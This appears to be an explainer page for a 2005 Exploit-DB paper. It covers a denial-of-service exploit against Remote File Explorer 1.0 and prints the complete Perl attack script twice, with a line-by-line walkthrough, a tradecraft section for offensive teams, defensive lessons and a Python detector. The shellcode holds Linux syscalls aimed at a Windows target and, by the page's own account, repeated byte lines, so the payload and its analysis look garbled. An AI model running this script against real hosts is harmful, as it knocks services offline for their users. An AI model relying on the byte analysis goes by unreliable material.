Remote File Explorer 1.0 Denial of Service Exploit Explained

What this paper is
This paper describes a Denial of Service (DoS) vulnerability in Remote File Explorer version 1.0. The exploit targets a specific vulnerability in how the software handles a particular network request, causing the server process to crash and become unresponsive, thus denying service to legitimate users.
Simple technical breakdown
The exploit works by sending a malformed network request to the Remote File Explorer service. The request is a specially crafted string: a text marker followed by a sequence of raw bytes. When the vulnerable server receives and attempts to process this string, it encounters an error in its logic and crashes. The core of the exploit is therefore the payload sent over the network, which is designed to trigger that crash.
Complete code and payload walkthrough
The provided script is written in Perl and uses the Socket module for network communication.
#!/usr/local/bin/perl
#
# Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
# [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
# [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$sploit = "|REBOOT_COMPUTER|".
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";
$msg = $sploit;
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
# milw0rm.com [2005-07-11]
Code Fragment/Block -> Practical Purpose
- #!/usr/local/bin/perl: Shebang line, indicating the script should be executed with the Perl interpreter.
- Comments (# ...): Provide context, status messages, and information about the exploit.
- $ARGC=@ARGV; if ($ARGC !=1) { ... }: Checks that exactly one command-line argument (the target host) is provided. If not, it prints usage instructions and exits.
- use Socket;: Imports the Socket module, which provides functions for network programming.
- my($remote,$port,$iaddr,$paddr,$proto);: Declares variables to store network-related information.
- $remote=$ARGV[0];: Assigns the first command-line argument (the target hostname or IP address) to the $remote variable.
- $port = "1001";: Sets the target port to 1001, the default port for Remote File Explorer.
- $iaddr = inet_aton($remote) or die "Error: $!";: Converts the human-readable hostname/IP address into a packed binary network address.
- $paddr = sockaddr_in($port, $iaddr) or die "Error: $!";: Creates a socket address structure from the port and network address.
- $proto = getprotobyname('tcp') or die "Error: $!";: Retrieves the protocol number for TCP.
- socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";: Creates a new TCP socket. SOCK is the filehandle for this socket.
- connect(SOCK, $paddr) or die "Error: $!";: Attempts to establish a TCP connection to the target host and port.
- $sploit = "|REBOOT_COMPUTER|". ... ;: The core of the exploit. It defines the string that will be sent to the server.
- "|REBOOT_COMPUTER|": A literal string. Its exact purpose within the exploit is not explicitly detailed in the paper, but it might be a marker or a command intended for the Remote File Explorer application.
- "\xeb\x6e\x5e\x29\xc0..." (the full byte string in the listing above): A sequence of hexadecimal bytes representing machine code. This is the actual payload designed to trigger the DoS. Without a disassembler and deeper analysis of the Remote File Explorer binary, the exact sequence of operations performed by this shellcode is unknown. However, it is common for such payloads to attempt operations that lead to a crash, such as:
- Dereferencing a NULL pointer.
- Writing to an invalid memory location.
- Executing an illegal instruction.
- Causing an infinite loop or excessive resource consumption.
The presence of bytes like \xeb (JMP), \x5e (POP ESI), \x29\xc0 (SUB EAX, EAX), \x89 (MOV), \x46 (INC ESI), \xb0 (MOV AL, imm8), \xcd\x80 (INT 0x80, the Linux syscall gate; this target is Windows, so it might be misinterpreted or part of a larger structure), \x66 (operand-size override prefix), \x8d (LEA), \x43 (INC EBX), \x31\xc0 (XOR EAX, EAX), \x90 (NOP), \x0b (OR) and \xe8 (CALL) suggests typical shellcode patterns. Note that these are single-byte readings: in the sequence as written, several of them (for example \x46 and \x4e after \x89 or \x8d) sit in the position of a ModR/M operand byte of the preceding instruction rather than standing as opcodes of their own. The specific sequence is crafted to exploit a particular vulnerability in the target application's parsing or handling of this data.
- $msg = $sploit;: Assigns the constructed payload string to the $msg variable.
- print $msg;: Prints the payload to standard output (mostly for debugging, to see what is being sent).
- send(SOCK, $msg, 0) or die "Cannot send query: $!";: Sends $msg (the exploit payload) over the established TCP connection. The 0 indicates no special flags.
- sleep(1);: Pauses execution for 1 second, likely to allow the server to process the data and crash.
- close(SOCK);: Closes the network connection.
- exit;: Exits the script.
Shellcode/Payload Segment -> Practical Purpose
The entire sequence of hexadecimal bytes starting from \xeb\x6e... is the shellcode. Without the target binary and a debugger, a precise, instruction-by-instruction breakdown of the shellcode's intended actions is not possible. Note also that several eight-byte lines of the listing appear two or three times verbatim (for example the lines beginning \x40\x89\xc3, \x46\x08\x8d, \x14\x89\x4e and \xc3\xb0\x3f), which further complicates reading the bytes as one coherent instruction stream. However, based on common exploit patterns for DoS, this shellcode is designed to:
- Trigger a specific vulnerability: It contains data or instructions that, when processed by the vulnerable Remote File Explorer service, lead to an unhandled exception or a fatal error.
- Cause a crash: The ultimate goal is to make the server process terminate unexpectedly, thus rendering the service unavailable.
The specific bytes are likely crafted to:
- Overwrite critical memory structures.
- Cause an invalid memory access.
- Execute an instruction that the processor cannot handle in the current context.
- Enter an infinite loop, consuming resources.
The |REBOOT_COMPUTER| prefix is a string literal. It's unclear if this string is directly processed by the vulnerable code or if it's just a preamble. The subsequent bytes are the machine code.
Practical details for offensive operations teams
- Required Access Level: Network access to the target host on port 1001. No local privileges are required on the target machine.
- Lab Preconditions:
- A target machine running Remote File Explorer 1.0.
- The target machine must be accessible over the network on TCP port 1001.
- A testing machine with Perl and the Socket module installed.
- Tooling Assumptions:
- Perl interpreter.
- Standard network utilities (e.g., ping, nmap to verify port status).
- A disassembler (like IDA Pro or Ghidra) would be invaluable for analyzing the target binary to understand why this payload works, but is not strictly required to execute the exploit.
- Execution Pitfalls:
- Incorrect Port: If Remote File Explorer is configured to listen on a different port, the exploit will fail.
- Firewall Blocking: Network firewalls can block traffic to port 1001.
- Service Not Running: The exploit will fail if the Remote File Explorer service is not running or is not listening on the expected port.
- Version Mismatch: The exploit is specific to Remote File Explorer 1.0. Newer versions or different applications will not be affected.
- Network Latency/Packet Loss: While less likely to cause a complete failure for a simple DoS, significant network issues could prevent the payload from reaching the server correctly.
- Antivirus/Intrusion Detection Systems (IDS): While this exploit is old, network-based IDS might flag the unusual traffic pattern or the specific payload bytes if signatures exist.
- Tradecraft Considerations:
- Reconnaissance: Confirm the target application and version are present. Identify the listening port.
- Stealth: This exploit is noisy as it directly connects and sends data. It's unlikely to be stealthy.
- Impact Assessment: A DoS can disrupt operations. Ensure authorization is clear for such disruptive actions.
- Post-Exploitation: For a DoS, there is no "post-exploitation" in the traditional sense of gaining further access. The goal is service disruption.
Where this was used and when
- Context: This exploit targets the Remote File Explorer application, likely a file sharing or remote administration tool.
- Approximate Years/Dates: Published on Exploit-DB on July 11, 2005. The vulnerability likely existed and was exploited around this time. The "Tested on Windows2000 SP4" indicates it was relevant for that operating system version.
Defensive lessons for modern teams
- Patch Management: Keep all software, especially network-facing services, updated to the latest stable versions. This exploit targets an old, unpatched version.
- Network Segmentation: Isolate critical services on separate network segments to limit the blast radius of a DoS attack.
- Intrusion Detection/Prevention Systems (IDS/IPS): Deploy and maintain IDS/IPS with up-to-date signatures to detect and potentially block malformed or suspicious network traffic.
- Service Hardening: Configure services to run with minimal privileges and disable unnecessary features.
- Regular Audits: Periodically audit running services and their versions to identify vulnerable software.
- Application Security Testing: For custom applications, conduct thorough security testing (including fuzzing) to uncover vulnerabilities before deployment.
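As an added illustration of the IDS/IPS lesson above (this code is not part of the original Exploit-DB paper or of Remote File Explorer), the following detector classifies client-to-server TCP payloads using only what the page establishes about the request: destination port 1001, the literal "|REBOOT_COMPUTER|" prefix, and a body of raw non-text bytes after it. The flow records at the bottom are constructed for the example; the binary body is an arbitrary run of high bytes, not the page's payload.

```python
# Added example: flag TCP payloads that match the Remote File Explorer DoS
# request shape described on this page. Not the project's or the paper's code.
from dataclasses import dataclass
from typing import List, Optional

MARKER = b"|REBOOT_COMPUTER|"   # literal prefix of the exploit string on this page
TARGET_PORT = 1001              # default Remote File Explorer port per the page
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


@dataclass(frozen=True)
class Alert:
    severity: str          # "high" or "low"
    reason: str
    nonprintable_ratio: float


def nonprintable_ratio(data: bytes) -> float:
    """Fraction of bytes outside printable ASCII (tab, CR and LF count as text)."""
    if not data:
        return 0.0
    text = sum(1 for b in data if b in TEXT_BYTES)
    return 1.0 - text / len(data)


def inspect_payload(dst_port: int, payload: bytes, threshold: float = 0.5) -> Optional[Alert]:
    """Classify one client-to-server TCP payload.

    Returns None when the page's pattern does not match, a low-severity Alert
    when only the marker is present, and a high-severity Alert when the marker
    is followed by mostly non-text bytes (the shape of the DoS request).
    """
    if dst_port != TARGET_PORT or not payload.startswith(MARKER):
        return None
    ratio = nonprintable_ratio(payload[len(MARKER):])
    if ratio >= threshold:
        return Alert("high", "REBOOT_COMPUTER marker followed by binary data", ratio)
    return Alert("low", "REBOOT_COMPUTER marker with text body", ratio)


def scan_flows(flows: List[dict]) -> List[dict]:
    """Run inspect_payload over reassembled flow records and return alert rows."""
    rows = []
    for flow in flows:
        alert = inspect_payload(flow["dst_port"], flow["payload"])
        if alert is not None:
            rows.append({"src": flow["src"], "dst_port": flow["dst_port"], **alert.__dict__})
    return rows


# Constructed sample flows (not captured traffic). Assumed record layout:
# src address, destination port, reassembled client payload.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst_port": 1001, "payload": b"LIST C:\\\r\n"},
    {"src": "10.0.0.9", "dst_port": 1001, "payload": MARKER + bytes(range(0x80, 0x98))},
    {"src": "10.0.0.9", "dst_port": 8080, "payload": MARKER + bytes(range(0x80, 0x98))},
    {"src": "10.0.0.7", "dst_port": 1001, "payload": MARKER + b"now\r\n"},
]

if __name__ == "__main__":
    for row in scan_flows(SAMPLE_FLOWS):
        print(f"[{row['severity']}] {row['src']} -> :{row['dst_port']} "
              f"{row['reason']} (non-text ratio {row['nonprintable_ratio']:.2f})")
```

The marker check alone is the equivalent of a content-match signature; the non-text ratio is what separates the DoS request from an ordinary text command that happens to start with the same token, and the threshold can be lowered if the service is known to speak a purely textual protocol.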
ASCII visual (if applicable)
This exploit is a direct network interaction. An ASCII visual might represent the connection and data flow.
+-----------------+       TCP Port 1001       +--------------------------+
| Attacker (Perl) | ------------------------> | Remote File Explorer 1.0 |
|                 |     (Exploit Payload)     |       (Vulnerable)       |
+-----------------+                           +--------------------------+
                                                          |
                                                          | (Malicious data processed)
                                                          v
                                                     +----------+
                                                     |  CRASH   |
                                                     +----------+
                                                (Service Unavailable)
Source references
- Paper ID: 1100
- Paper Title: Remote File Explorer 1.0 - Denial of Service
- Author: basher13
- Published: 2005-07-11
- Keywords: Windows, dos
- Paper URL: https://www.exploit-db.com/papers/1100
- Raw URL: https://www.exploit-db.com/raw/1100
Original Exploit-DB Content (Verbatim)
#!/usr/local/bin/perl
#
# Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
# [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
# [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com
$ARGC=@ARGV;
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
$sploit = "|REBOOT_COMPUTER|".
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";
$msg = $sploit;
print $msg;
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
close(SOCK);
exit;
# milw0rm.com [2005-07-11]